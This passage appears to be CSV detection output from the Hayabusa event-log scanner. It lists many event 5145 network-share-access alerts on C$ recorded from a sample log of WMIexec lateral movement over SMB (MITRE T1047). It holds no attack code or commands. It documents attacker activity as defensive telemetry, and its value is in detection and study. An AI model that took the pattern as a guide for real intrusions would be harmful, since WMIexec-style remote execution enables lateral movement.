10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File 
Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
